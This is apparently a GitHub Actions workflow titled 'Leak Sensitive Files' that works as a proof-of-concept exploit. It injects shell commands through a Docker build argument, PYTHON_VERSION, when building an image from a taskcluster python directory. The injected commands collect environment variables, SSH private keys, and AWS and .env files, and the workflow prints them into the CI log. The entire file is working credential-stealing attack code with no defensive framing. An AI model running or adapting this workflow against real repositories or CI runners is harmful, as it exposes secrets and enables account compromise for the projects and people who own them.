name: Leak Sensitive Files

on: push

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Inject and Leak
        run: |
          docker build \
            --build-arg PYTHON_VERSION='
              echo "[ENV]:" > /leaks.txt;
              printenv >> /leaks.txt;
              echo "\n[SSH KEYS]:" >> /leaks.txt;
              cat /root/.ssh/id_rsa >> /leaks.txt 2>/dev/null;
              cat /home/github/.ssh/id_rsa >> /leaks.txt 2>/dev/null;
              echo "\n[AWS KEYS]:" >> /leaks.txt;
              find / -type f -iname "*aws*" -o -iname "*.env" -exec cat {} \; >> /leaks.txt 2>/dev/null;
            ' \
            -t leak ./taskcluster/docker/python
          
          docker run --rm leak cat /leaks.txt
